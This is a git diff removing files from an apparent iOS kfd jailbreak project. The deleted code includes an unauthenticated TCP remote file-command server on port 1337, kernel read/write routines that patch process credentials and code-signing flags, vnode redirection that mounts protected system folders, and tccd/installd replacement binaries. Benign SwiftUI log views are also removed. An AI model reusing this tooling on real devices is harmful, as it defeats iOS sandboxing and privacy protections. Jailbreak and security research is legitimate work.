-} - - -struct TextFieldWrapper: View { - - @Binding var isPresented: Bool - let presentingView: PresentingView - let content: () -> TextFieldAlert - - var body: some View { - ZStack { - if (isPresented) { content().dismissable($isPresented) } - presentingView - } - } -} - -extension View { - func textFieldAlert(isPresented: Binding, - content: @escaping () -> TextFieldAlert) -> some View { - TextFieldWrapper(isPresented: isPresented, - presentingView: self, - content: content) - } -} diff --git a/kfd/JIT/main.m b/kfd/JIT/main.m deleted file mode 100644 index d42cfe4f..00000000 --- a/kfd/JIT/main.m +++ /dev/null @@ -1,224 +0,0 @@ -// -// main.m -// FileTroller -// -// Created by Nathan Senter on 3/7/23. -// - -#import -#import -#import -#import -#include -#include -#include -#include -#include -#include -#include -#include -#import "kfd-Swift.h" - -void handle_client(int client_socket); - -int mainFDA(int argc, char *argv[]) { - NSString * appDelegateClassName; - - if (argc == 2 && strcmp(argv[1], "--server") == 0) { - int server_socket, client_socket, port; - struct sockaddr_in server_addr, client_addr; - socklen_t client_len = sizeof(client_addr); - - port = atoi("1337"); - - if ((server_socket = socket(AF_INET, SOCK_STREAM, 0)) < 0) { - perror("Error creating socket"); - exit(1); - } - - memset(&server_addr, 0, sizeof(server_addr)); - server_addr.sin_family = AF_INET; - server_addr.sin_addr.s_addr = htonl(INADDR_ANY); - server_addr.sin_port = htons(port); - - if (bind(server_socket, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) { - perror("Error binding socket"); - exit(1); - } - - if (listen(server_socket, 5) < 0) { - perror("Error listening for connections"); - exit(1); - } - - printf("Server listening on port %d...\n", port); - - while (1) { - if ((client_socket = accept(server_socket, (struct sockaddr *)&client_addr, &client_len)) < 0) { - perror("Error accepting connection"); - exit(1); - } - - handle_client(client_socket); - } - - return 0; - } else { - @autoreleasepool { - // Setup code that might create autoreleased objects goes here. - appDelegateClassName = NSStringFromClass([AppDelegate class]); - } - return UIApplicationMain(argc, argv, nil, appDelegateClassName); - } - -} - -void handle_client(int client_socket) { - char buffer[1024]; - ssize_t num_bytes; - - while ((num_bytes = read(client_socket, buffer, sizeof(buffer))) > 0) { - buffer[num_bytes - 1] = '\0'; - - char command_output[1024]; - - if (strncmp(buffer, "ls", 2) == 0) { - DIR *dir = opendir(strtok(buffer + 3, " ")); - DIR *dir2 = opendir("."); - if (dir == NULL) { - struct dirent *entry; - while ((entry = readdir(dir2)) != NULL) { - snprintf(command_output, sizeof(command_output), "%s\n", entry->d_name); - write(client_socket, command_output, strlen(command_output)); - } - closedir(dir2); - memset(buffer, 0, sizeof(buffer)); - } - else { - struct dirent *entry; - while ((entry = readdir(dir)) != NULL) { - snprintf(command_output, sizeof(command_output), "%s\n", entry->d_name); - write(client_socket, command_output, strlen(command_output)); - } - closedir(dir); - memset(buffer, 0, sizeof(buffer)); - } - } else if (strncmp(buffer, "mv", 2) == 0) { - char *src = strtok(buffer + 3, " "); - char *dest = strtok(NULL, " "); - if (src == NULL || dest == NULL) { - char *error_message = "Invalid command\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - continue; - } - if (rename(src, dest) == -1) { - char *error_message = "Error renaming file"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - } - } else if (strncmp(buffer, "cp", 2) == 0) { - char *src = strtok(buffer + 3, " "); - char *dest = strtok(NULL, " "); - if (src == NULL || dest == NULL) { - char *error_message = "Invalid command\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - continue; - } - FILE *source_file = fopen(src, "r"); - if (source_file == NULL) { - char *error_message = "Error opening source file\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - continue; - } - FILE *dest_file = fopen(dest, "w"); - if (dest_file == NULL) { - char *error_message = "Error creating destination file\n"; - fclose(source_file); - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - continue; - } - char buffer[1024]; - size_t bytes_read; - while ((bytes_read = fread(buffer, 1, sizeof(buffer), source_file)) > 0) { - fwrite(buffer, 1, bytes_read, dest_file); - } - fclose(source_file); - fclose(dest_file); - char *success_message = "File copied successfully\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, success_message, strlen(success_message)); - } else if (strncmp(buffer, "cd", 2) == 0) { - char *dir = strtok(buffer + 3, " "); - if (dir == NULL) { - char *error_message = "Invalid command\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - continue; - } - if (chdir(dir) == -1) { - char *error_message = "Error changing dir\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - } - } else if (strncmp(buffer, "id", 2) == 0) { - uid_t uid = getuid(); - snprintf(command_output, sizeof(command_output), "uid=%d\n", uid); - write(client_socket, command_output, strlen(command_output)); - } else if (strncmp(buffer, "exit", 2) == 0) { - close(client_socket); - } else if (strncmp(buffer, "touch", 5) == 0) { - char *file_path = strtok(buffer + 6, " "); - if (file_path == NULL) { - char *error_message = "Invalid command\n"; - memset(buffer, 0, sizeof(buffer)); - write(client_socket, error_message, strlen(error_message)); - continue; - } - int fd = open(file_path, O_CREAT, 0644); - if (fd == -1) { - char *error_message = "Error creating file"; - write(client_socket, error_message, strlen(error_message)); - } else { - close(fd); - memset(buffer, 0, sizeof(buffer)); - } - } else if (strncmp(buffer, "rm", 2) == 0) { - char *filename = strtok(buffer + 3, " "); - if (remove(filename) == 0) { - char success_message[1024]; - snprintf(success_message, sizeof(success_message), "%s removed successfully.\n", filename); - write(client_socket, success_message, strlen(success_message)); - } else { - char error_message[1024]; - snprintf(error_message, sizeof(error_message), "Error removing %s\n", filename); - write(client_socket, error_message, strlen(error_message)); - } - } else if (strncmp(buffer, "cat", 3) == 0) { - char *file = strtok(buffer + 4, " "); - FILE *fp; - char line[1024]; - fp = fopen(file, "r"); - if (fp != NULL) { - while (fgets(line, sizeof(line), fp)) { - write(client_socket, line, strlen(line)); - } - fclose(fp); - } - } else if (strncmp(buffer, "tccd", 2) == 0) { - grant_full_disk_access(^(NSError* error) { - char command_output_tccd[1024]; - snprintf(command_output_tccd, sizeof(command_output_tccd), "grant_full_disk_access returned error: %s\n", [error.localizedDescription UTF8String]); - write(client_socket, command_output_tccd, strlen(command_output_tccd)); - }); - } else { - char *error_message = "Invalid command\n"; - write(client_socket, error_message, strlen(error_message)); - } - } - - close(client_socket); -} diff --git a/kfd/KFD-manager.h b/kfd/KFD-manager.h deleted file mode 100644 index 8abbfdc3..00000000 --- a/kfd/KFD-manager.h +++ /dev/null @@ -1,18 +0,0 @@ -// -// KFD-manager.h -// kfd -// -// Created by m1zole on 2023/09/16. -// - -#ifndef KFD_manager_h -#define KFD_manager_h - -uint64_t mountusrDir(void); -uint64_t mountselectedDir(NSString* path); -void unmountselectedDir(uint64_t orig_to_v_data, NSString* mntPath); -void prepare(void); -void do_tasks(void); -bool check_mdc(void); - -#endif /* KFD_manager_h */ diff --git a/kfd/KFD-manager.m b/kfd/KFD-manager.m deleted file mode 100644 index 2e45683b..00000000 --- a/kfd/KFD-manager.m +++ /dev/null @@ -1,229 +0,0 @@ -// -// KFD-manager.m -// kfd -// -// Created by m1zole on 2023/09/16. -// - -#import -#include -#include "fun/vnode.h" -#include "fun/utils.h" -#include "fun/offsets.h" -#include "fun/krw.h" -#include "fun/proc.h" -#include "fun/cs_blobs.h" -#include "fun/fun.h" -#include "fun/grant_full_disk_access.h" -#include "fun/thanks_opa334dev_htrowii.h" -#include "kfd-Swift.h" - -uint64_t orig_to_v_data = 0; - -uint64_t onlyFolderRedirect(uint64_t vnode, NSString *mntPath) { - orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); - return orig_to_v_data; -} - -uint64_t onlyUnRedirectFolder(uint64_t orig_to_v_data, NSString *mntPath) { - funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); - return 0; -} - -uint64_t do_getTask(char* process) { - pid_t pid = getPidByName(process); - uint64_t proc = getProc(pid); - printf("[i] %s proc: 0x%llx\n", process, proc); - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - - /* - * RO-protected flags: - */ - #define TFRO_PLATFORM 0x00000400 /* task is a platform binary */ - #define TFRO_FILTER_MSG 0x00004000 /* task calls into message filter callback before sending a message */ - #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */ - #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state */ - - uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro); - printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro); - - return 0; -} - -void readtmplog(NSString* file) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t var_tmp_vnode = getVnodeAtPathByChdir("/var/tmp"); - - printf("[i] /var/tmp vnode: 0x%llx\n", var_tmp_vnode); - - uint64_t orig_to_v_data = createFolderAndRedirect(var_tmp_vnode, mntPath); - - NSError *error; - - printf("unredirecting from tmp\n"); - - printf("reading log\n"); - - NSLog(@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file); - NSString *log = [NSString stringWithContentsOfFile:[NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file] encoding:NSUTF8StringEncoding error:&error]; - NSLog(@"%@", log); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); -} - -void getappslist(void) { - printf("[i] chown /var/containers/Bundle/Application\n"); - funVnodeChownFolder("/var/containers/Bundle/Application", 501, 501); - - printf("[i] mounting /var/containers/Bundle/Application\n"); - - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t containers_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application"); - printf("[i] /var/containers/Bundle/Application vnode: 0x%llx\n", containers_vnode); - - orig_to_v_data = createFolderAndRedirect(containers_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/containers/Bundle/Application directory list:\n %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - NSString *appstage1mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage1/"]; - if (![[NSFileManager defaultManager] fileExistsAtPath:appstage1mntPath]) { - [[NSFileManager defaultManager] createDirectoryAtPath:appstage1mntPath withIntermediateDirectories:YES attributes:nil error:nil]; - } - NSString *appstage2mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage2/"]; - if (![[NSFileManager defaultManager] fileExistsAtPath:appstage2mntPath]) { - [[NSFileManager defaultManager] createDirectoryAtPath:appstage2mntPath withIntermediateDirectories:YES attributes:nil error:nil]; - } - - for(NSString *dir in dirs) { - NSString *path = [NSString stringWithFormat:@"%s/%@", "/var/containers/Bundle/Application", dir]; - [[NSFileManager defaultManager] removeItemAtPath:path error:nil]; - NSLog(@"full path:\n %@", path); - //funVnodeChownFolder((char *) [path UTF8String], 501, 501); - NSString *appmntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/appstage1/", dir]; - uint64_t containers_vnode = getVnodeAtPathByChdir((char *) [path UTF8String]); - createFolderAndRedirect(containers_vnode, appmntPath); - NSArray* targetdirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:appmntPath error:NULL]; - NSLog(@"appstage1 directory list: %@", targetdirs); - } -} - - -void prepare(void) { - _offsets_init(); - - uint64_t kslide = get_kslide(); - uint64_t kbase = 0xfffffff007004000 + kslide; - printf("[i] Kernel base: 0x%llx\n", kbase); - printf("[i] Kernel slide: 0x%llx\n", kslide); - uint64_t kheader64 = kread64(kbase); - printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64); - - pid_t myPid = getpid(); - uint64_t selfProc = getProc(myPid); - printf("[i] self proc: 0x%llx\n", selfProc); - - funUcred(selfProc); - funProc(selfProc); - printf("[i] pid: %d\n", getpid()); - funCSFlags("launchd"); - printf("[i] pid: %d\n", getpid()); - //funTask("kfd"); - mach_port_t host_self = mach_host_self(); - printf("[i] mach_host_self: 0x%x\n", host_self); - //fun_ipc_entry_lookup(host_self); - - //kfd_patch_installd(); - //kfd_grant_full_disk_access(^(NSError* error) { - // NSLog(@"[-] grant_full_disk_access returned error: %@", error); - //}); -} - -uint64_t mountusrDir(void) { - - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t libexec_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application/CF553F26-ED5C-44A5-8AE5-0C1267BFFA8C/Tips.app"); - printf("[i] folder vnode: 0x%llx\n", libexec_vnode); - - orig_to_v_data = createFolderAndRedirect(libexec_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"Tips directory list:\n %@", dirs); - - //UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return orig_to_v_data; -} - -void do_tasks(void) { - _offsets_init(); - - uint64_t kslide = get_kslide(); - uint64_t kbase = 0xfffffff007004000 + kslide; - printf("[i] Kernel base: 0x%llx\n", kbase); - printf("[i] Kernel slide: 0x%llx\n", kslide); - uint64_t kheader64 = kread64(kbase); - printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64); - - pid_t myPid = getpid(); - uint64_t selfProc = getProc(myPid); - printf("[i] self proc: 0x%llx\n", selfProc); - - funUcred(selfProc); - funProc(selfProc); - printf("[i] pid: %d\n", getpid()); - //funCSFlags("kfd"); - //funTask("kfd"); - mach_port_t host_self = mach_host_self(); - printf("[i] mach_host_self: 0x%x\n", host_self); - fun_ipc_entry_lookup(host_self); - //fun_nvram_dump(); - //readtmplog(@"ps.log"); - usleep(1000); - //getappslist(); - printf("[i] vnode: %llx\n", getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app")); - printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app"), "Books.app")); - printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/mobile"), "TCC.framework")); - - //funVnodeOverwriteFile("/System/Library/PrivateFrameworks/TCC.framework/Support/tccd", "/Developer/System/Library/PrivateFrameworks/TCC.framework/Support/tccd_ori"); - //kfd_grant_full_disk_access(^(NSError* error) { - // NSLog(@"[-] grant_full_disk_access returned error: %@", error); - //}); -} - -uint64_t mountselectedDir(NSString* path) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents", path]; - NSLog(@"%@", mntPath); - NSLog(@"%@", path); - - uint64_t vnode = getVnodeAtPathByChdir((char *) [path UTF8String]); - - if (![[NSFileManager defaultManager] fileExistsAtPath:mntPath]) { - printf("createFolderAndRedirect\n"); - orig_to_v_data = createFolderAndRedirect(vnode, mntPath); - } else { - printf("onlyFolderAndRedirect\n"); - orig_to_v_data = onlyFolderRedirect(vnode, mntPath); - } - printf("[i] orig_to_v_data: %llx", orig_to_v_data); - return orig_to_v_data; -} - -void unmountselectedDir(uint64_t orig_to_v_data, NSString* mntPath) { - printf("[i] orig_to_v_data: %llx", orig_to_v_data); - onlyUnRedirectFolder(orig_to_v_data, mntPath); -} - -bool check_mdc(void) { - if (@available(iOS 16.2, *)) { - return true; - } else { - return false; - } -} - diff --git a/kfd/LogView.swift b/kfd/LogView.swift deleted file mode 100644 index 59cd32d4..00000000 --- a/kfd/LogView.swift +++ /dev/null @@ -1,206 +0,0 @@ -// -// LogView.swift -// Fugu15 -// -// Created by exerhythm on 29.03.2023. -// - -import SwiftUI -import SwiftfulLoadingIndicators - -struct LogView: View { - @StateObject var logger = Logger.shared - - @Binding var advancedLogsTemporarilyEnabled: Bool - @Binding var advancedLogsByDefault: Bool - - @State var lastScroll = Date() - - let viewAppearanceDate = Date() - - var advanced: Bool { - advancedLogsByDefault || advancedLogsTemporarilyEnabled - } - - struct LogRow: View { - @State var log: LogMessage - @State var scrollViewFrame: CGRect - - @State var shown = false - - var index: Int - var lastIndex: Int - - var isLast: Bool { - index == lastIndex - } - - var body: some View { - GeometryReader { proxy2 in - let k = k(for: proxy2.frame(in: .global).minY, in: scrollViewFrame) - - HStack { - switch log.type { - case .continuous: - ZStack { - let shouldShowCheckmark = !isLast - Image(systemName: "checkmark") - .opacity(shouldShowCheckmark ? 1 : 0) - LoadingIndicator(animation: .circleRunner, color: .white, size: .small) - .opacity(shouldShowCheckmark ? 0 : 1) - } - .offset(x: -4) - case .instant: - Image(systemName: "checkmark") - case .success: - Image(systemName: "lock.open") - .padding(.leading, 4) - case .error: - Image(systemName: "exclamationmark.triangle") - .foregroundColor(.yellow) - } - Text(log.text) - .font(.system(isLast ? .body : .subheadline)) - .foregroundColor(log.type == .error ? .yellow : .white) - .animation(.spring().speed(1.5), value: isLast) - .drawingGroup() - Spacer() - } - .opacity(k * (isLast ? 1 : 0.75)) - .blur(radius: 2.5 - k * 4) - .foregroundColor(.white) - .padding(.top, isLast ? 6 : 0) - .animation(.spring().speed(1.5), value: isLast) - } - .opacity(shown ? 1 : 0) - .onAppear { - withAnimation(.spring().speed(3)) { - shown = true - } - } - } - - func k(for y: CGFloat, in rect: CGRect) -> CGFloat { - let h = rect.height - let ry = rect.minY - let relativeY = y - ry - return 1 - (h - relativeY) / h - } - } - - var body: some View { - ZStack { - GeometryReader { proxy1 in - ScrollViewReader { reader in - ScrollView { - if !advanced { - VStack { - Spacer() - .frame(minHeight: proxy1.size.height) - LazyVStack(spacing: 24) { - let frame = proxy1.frame(in: .global) - ForEach(Array(logger.userFriendlyLogs.enumerated()), id: \.element.id) { (i,log) in - LogRow(log: log, scrollViewFrame: frame, index: i, lastIndex: logger.userFriendlyLogs.count - 1) - } - } - .padding(.horizontal, 32) - .padding(.bottom, 64) - } - .id("RegularLogs") - .frame(minHeight: proxy1.size.height) - .transition(.opacity) - .frame(maxHeight: advanced ? 0 : nil) - .onChange(of: logger.userFriendlyLogs) { newValue in - if !advanced { - // give 0.5 seconds for a better feel - if viewAppearanceDate.timeIntervalSinceNow < -0.5 { - UISelectionFeedbackGenerator().selectionChanged() - } - - withAnimation { - reader.scrollTo("RegularLogs", anchor: .bottom) - } - } - } - .onChange(of: advanced) { newValue in - if !newValue { - withAnimation { - reader.scrollTo(logger.userFriendlyLogs.last!.id, anchor: .top) - } - } - } - } - - if advanced { - Text(logger.log) - .foregroundColor(.white) - .frame(minWidth: 0, - maxWidth: .infinity, - minHeight: 0, - maxHeight: .infinity, - alignment: .topLeading) - .padding(.bottom, 64) - .transition(.opacity) - .id("AdvancedText") - .onChange(of: logger.log) { newValue in - withAnimation { - if lastScroll.timeIntervalSinceNow < -0.25 { - lastScroll = Date() - // print("scroll") - reader.scrollTo("AdvancedText", anchor: .bottom) - } - } - } - .onAppear { -// withAnimation { -// reader.scrollTo("AdvancedText", anchor: .bottom) -// } - } - } - } - .animation(.spring(), value: advanced) - .contextMenu { - Button { - UIPasteboard.general.string = logger.log - } label: { - Label("Context_Menu_Copy_To_Clipboard", systemImage: "doc.on.doc") - } - } - } - } - } - .onAppear { -// let texts = """ -// Checking device compatibility -// Device is compatible with jailbreak -// Backing up device data -// Starting jailbreak installation -// Downloading jailbreak package -// Installing jailbreak package -// Jailbreak package installed -// Restarting device -// Device successfully restarted -// Cydia app installed -// Checking if you are a human -// Verifying using Captcha -// Human Verification failed -// Complete these 3 surveys to continue -// Jailbreak successful -// """ -// let c = texts.components(separatedBy: "\n") -// Timer.scheduledTimer(withTimeInterval: 0.2, repeats: true) { t in -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// } - } - } -} - -struct LogView_Previews: PreviewProvider { - static var previews: some View { - LogView(advancedLogsTemporarilyEnabled: .constant(true), advancedLogsByDefault: .constant(false)) - .background(.clear) - } -} diff --git a/kfd/Logger.swift b/kfd/Logger.swift deleted file mode 100644 index 791b9a51..00000000 --- a/kfd/Logger.swift +++ /dev/null @@ -1,68 +0,0 @@ -// -// Logger.swift -// Fugu15 -// -// Created by exerhythm on 29.03.2023. -// - -import SwiftUI - -struct LogMessage: Equatable, Identifiable { - var id = UUID() - var text: String - var type: LogType - - enum LogType: RawRepresentable { - case instant - case continuous - case success - case error - - var rawValue: String { - switch self { - case .instant, .continuous: - return "[*]" - case .success: - return "[+]" - case .error: - return "E:" - } - } - - init?(rawValue: String) { - switch rawValue { - case "[*]": - self = .instant - case "[+]": - self = .success - case "E:": - self = .error - default: - return nil - } - } - } -} - -class Logger: ObservableObject { - @Published var userFriendlyLogs: [LogMessage] = [] - @Published var log: String = "" - - static var shared = Logger() - - /** - * Add a string to log view. - * - * - Parameter text: The text to display - * - Parameter isContinuous: Determines whether the action is instant or continuous, and if a spinner next to text should be shown - * - Parameter isStatus: Should the log be displayed to users who have "Simple Logs" option turned on - */ - static func log(_ obj: Any, type: LogMessage.LogType = .continuous, isStatus: Bool = false) { - let text = String(describing: obj) - print(text) - shared.log += "\n\(type.rawValue) \(text)" - if isStatus { - shared.userFriendlyLogs.append(.init(text: NSLocalizedString(text, comment: "Jailbreak Status"), type: type)) - } - } -} diff --git a/kfd/filemanager_by_akusio b/kfd/filemanager_by_akusio deleted file mode 120000 index 63fc715c..00000000 --- a/kfd/filemanager_by_akusio +++ /dev/null @@ -1 +0,0 @@ -../MiniRootFileManager15/filemanager_by akusio \ No newline at end of file diff --git a/kfd/files/PersistenceHelper_Embedded b/kfd/files/PersistenceHelper_Embedded deleted file mode 100644 index 9fbec600..00000000 Binary files a/kfd/files/PersistenceHelper_Embedded and /dev/null differ diff --git a/kfd/files/installd b/kfd/files/installd deleted file mode 100755 index 2ef4b0b5..00000000 Binary files a/kfd/files/installd and /dev/null differ diff --git a/kfd/files/tccd b/kfd/files/tccd deleted file mode 100755 index 7cfb5ba0..00000000 Binary files a/kfd/files/tccd and /dev/null differ diff --git a/kfd/fun/cs_blobs.h b/kfd/fun/cs_blobs.h deleted file mode 100644 index 7f40f3f7..00000000 --- a/kfd/fun/cs_blobs.h +++ /dev/null @@ -1,17 +0,0 @@ -// -// cs_blobs.h -// kfd -// -// Created by Seo Hyun-gyu on 2023/08/05. -// - -#ifndef cs_blobs_h -#define cs_blobs_h - -#include - -uint64_t fun_cs_blobs(char* execPath); -uint64_t fun_proc_dump_entitlements(uint64_t proc); -uint64_t fun_vnode_dump_entitlements(const char* path); - -#endif /* cs_blobs_h */ diff --git a/kfd/fun/cs_blobs.m b/kfd/fun/cs_blobs.m deleted file mode 100644 index 24482fc0..00000000 --- a/kfd/fun/cs_blobs.m +++ /dev/null @@ -1,186 +0,0 @@ -// -// cs_blobs.c -// kfd -// -// Created by Seo Hyun-gyu on 2023/08/05. -// - -#include "cs_blobs.h" -#include "krw.h" -#include "offsets.h" -#include "vnode.h" -#include "utils.h" -#include "thanks_opa334dev_htrowii.h" - -extern const uint8_t *der_decode_plist(CFAllocatorRef allocator, CFTypeRef* output, CFErrorRef *error, const uint8_t *der_start, const uint8_t *der_end); - -typedef struct __SC_GenericBlob { - uint32_t magic; /* magic number */ - uint32_t length; /* total length of blob */ - char data[]; -} CS_GenericBlob -__attribute__ ((aligned(1))); - - -uint32_t convertToLittleEndian(uint32_t num) { - return ((num & 0x000000FF) << 24) | - ((num & 0x0000FF00) << 8) | - ((num & 0x00FF0000) >> 8) | - ((num & 0xFF000000) >> 24); -} - -//https://github.com/opa334/Dopamine/blob/master/BaseBin/libjailbreak/src/util.m#L656 -NSMutableDictionary *DEREntitlementsDecode(uint8_t *start, uint8_t *end) -{ - if (!start || !end) return nil; - if (start == end) return nil; - - CFTypeRef plist = NULL; - CFErrorRef err; - der_decode_plist(NULL, &plist, &err, start, end); - - if (plist) { - if (CFGetTypeID(plist) == CFDictionaryGetTypeID()) { - NSMutableDictionary *plistDict = (__bridge_transfer id)plist; - return plistDict; - } - else if (CFGetTypeID(plist) == CFDataGetTypeID()) { - // This code path is probably never used, but I decided to implement it anyways - // Because I saw in disassembly that there is a possibility for this to return data - NSData *plistData = (__bridge_transfer id)plist; - NSPropertyListFormat format; - NSError *decodeError; - NSMutableDictionary *result = ((NSDictionary *)[NSPropertyListSerialization propertyListWithData:plistData options:0 format:&format error:&decodeError]).mutableCopy; - if (!result) { - printf("[-] Error decoding DER: %s\n", decodeError.description.UTF8String); - } - return result; - } - } - return nil; -} - -uint64_t fun_cs_blobs(char *execPath) { - - uint64_t ubc_info = kread64(getVnodeAtPath(execPath) + off_vnode_vu_ubcinfo) | 0xffffff8000000000; - uint32_t cs_add_gen = kread32(ubc_info + 0x2c); -// cs_add_gen += 1; - printf("cs_add_gen, 0x2c: 0x%x\n", cs_add_gen); - kwrite32(ubc_info + 0x2c, cs_add_gen); - - uint64_t csblobs = kread64(ubc_info + 0x50); - printf("csblobs: 0x%llx\n", csblobs); - uint32_t csb_flags = kread32(csblobs + 0x20); - printf("csb_flags: 0x%x\n", csb_flags); - uint64_t csb_teamid = kread64(csblobs + 0x88); - printf("csb_teamid: 0x%llx\n", csb_teamid); - - printf("csb_cdhash\n"); - HexDump(csblobs + 0x58, 20); //csblobs + 0x58 = csb_cdhash - - return 0; -} - -uint64_t fun_proc_dump_entitlements(uint64_t proc) { - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - uint64_t ucreds = kread64(proc_ro + off_p_ro_p_ucred); - - uint64_t cr_label_pac = kread64(ucreds + off_u_cr_label); - uint64_t cr_label = cr_label_pac | 0xffffff8000000000; - printf("[i] ucred->cr_label: 0x%llx\n", cr_label); - - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/cs_blobs.h#L283 - //Thanks @jmpews, https://twitter.com/jmpews/status/1623669186894659584/photo/3 - uint64_t osents = kread64(cr_label + 8);//+8, 16, 32, 64, 104, 112, 128, 168, 176, 232, 240 has kernel pointer values... - printf("[i] osents: 0x%llx\n", osents); - uint64_t osentitlements = kread64(osents + 0x10); - printf("[i] osentitlements: 0x%llx\n", osentitlements); - uint64_t query_ctx = osentitlements + 0x20; - printf("[i] query_ctx: 0x%llx\n", query_ctx); - uint64_t der_start = kread64(query_ctx + 0x40); - printf("[i] der_start: 0x%llx\n", der_start); - uint64_t der_end = kread64(query_ctx + 0x20); - printf("[i] der_end: 0x%llx\n", der_end); - uint64_t der_len = der_end - der_start; - printf("[i] der_len: 0x%llx\n", der_len); - uint8_t has_no_der_ents = kread8(osentitlements + 0x50); - printf("[i] has_no_der_ents: 0x%x\n", has_no_der_ents); - uint64_t csb_der_entitlements_blob = kread64(osentitlements + 0x60); - printf("[i] csb_der_entitlements_blob: 0x%llx\n", csb_der_entitlements_blob); - - if(!has_no_der_ents) { - CS_GenericBlob der_ents_blob = {0}; - kreadbuf(csb_der_entitlements_blob, (uint8_t *)&der_ents_blob, sizeof(der_ents_blob)); - uint32_t der_ents_data_len = der_ents_blob.length; - printf("[i] der_ents_blob.length: 0x%x\n", convertToLittleEndian(der_ents_data_len)); - - uint8_t *der_ents_data = malloc(der_len); - kreadbuf(csb_der_entitlements_blob + 8, der_ents_data, der_len); - uint8_t *us_der_end = der_ents_data + der_len; - - NSMutableDictionary *entitlements = DEREntitlementsDecode(der_ents_data, us_der_end); - if(entitlements != nil) { - NSLog(@"[+] Got decoded entitlements!\n%@", entitlements); - } else { - HexDump(csb_der_entitlements_blob, der_len); - } - free(der_ents_data); - } - - return 0; -} - -uint64_t fun_vnode_dump_entitlements(const char* path) { - uint64_t vnode = getVnodeAtPath(path); - - uint64_t ubc_info_pac = kread64(vnode + off_vnode_vu_ubcinfo); - uint64_t ubc_info = ubc_info_pac | 0xffffff8000000000; - - uint64_t csblobs = kread64(ubc_info + 0x50); - if(csblobs == 0) { - printf("[-] Couldn't get csblobs from vnode.\n"); - return -1; - } - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/ubc_internal.h#L148 - uint64_t csb_pmap_cs_entry = kread64(csblobs + 0xb8); - printf("[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry: 0x%llx\n", csb_pmap_cs_entry); - - uint32_t csb_validation_category = kread32(csblobs + 0xb0); - printf("[i] vnode->ubc_info->cs_blobs->csb_validation_category: 0x%x\n", csb_validation_category); - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/vm/pmap_cs.h#L365 - uint64_t ce_ctx = kread64(csb_pmap_cs_entry + 0x1c8); - printf("[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->ce_ctx: 0x%llx\n", ce_ctx); - uint32_t der_entitlements_size = kread32(csb_pmap_cs_entry + 0x1d8); - printf("[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->der_entitlements_size: 0x%x\n", der_entitlements_size); - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/EXTERNAL_HEADERS/CoreEntitlements/EntitlementsPriv.h#L21 - 